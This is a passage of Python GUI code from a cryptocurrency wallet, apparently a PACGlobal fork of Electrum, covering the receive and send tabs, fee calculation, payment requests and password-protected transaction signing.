QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in duffs/kB return format_fee_satoshis(fee_rate, num_zeros=self.num_zeros) + ' duffs/kB' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): self.masternode_manager.send_subscriptions() server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
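            # Status text priority: synchronizing -> lagging server -> balance summary.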
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_proposals_tab() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l l.setObjectName("history_container") toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('PACGlobal address where the payment should be received. 
Note that each payment request uses a different PACGlobal address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding PACGlobal addresses.'), _('The PACGlobal address never expires and will always be part of this PacGlobal Electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.setObjectName("receive_container") w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = 
self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = {} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. 
To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} duffs are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a PACGlobal address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a PACGlobal address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. 
It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(self.amount_e.width()) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('PACGlobal transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) self.extra_payload = ExtraPayloadWidget(self) self.extra_payload.hide() msg = _('Extra payload.') + '\n\n'\ + _('PACGlobal DIP2 Special Transations extra payload.') self.extra_payload_label = HelpLabel(_('Extra payload'), msg) self.extra_payload_label.hide() grid.addWidget(self.extra_payload_label, 7, 0) grid.addWidget(self.extra_payload, 7, 1, 1, -1) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(self.amount_e.width()) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. 
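                    # Clearing the "modified" flag hands the field back to the
                    # automatic fee calculation in do_update_fee().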
edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(self.amount_e.width()) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_kb()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, PacGlobal Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 duffs might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit())) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED 
feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() w.setObjectName("send_container") vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return (outputs, fee_estimator, tx_desc, coins, tx_type, extra_payload) = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep, tx_type=tx_type, extra_payload=extra_payload) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. 
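        # Keep whichever of fee/feerate the user has frozen and derive the
        # other one from the estimated tx size; if neither is frozen, fall
        # back to the fee actually computed for the transaction.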
if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee * 1000 / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size / 1000) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee * 1000 / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. 
An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/kB feerate amount = 0 if amount is None else amount # sat/kB feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() tx_type, extra_payload = self.extra_payload.get_extra_data() return outputs, fee_estimator, label, coins, tx_type, extra_payload def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('PACGlobal Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid PACGlobal Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return (outputs, fee_estimator, tx_desc, coins, tx_type, extra_payload) = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep, tx_type=tx_type, extra_payload=extra_payload) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return if tx.tx_type: try: tx.extra_payload.check_after_tx_prepared(tx) 
except DashTxError as e: self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() if fee < self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = 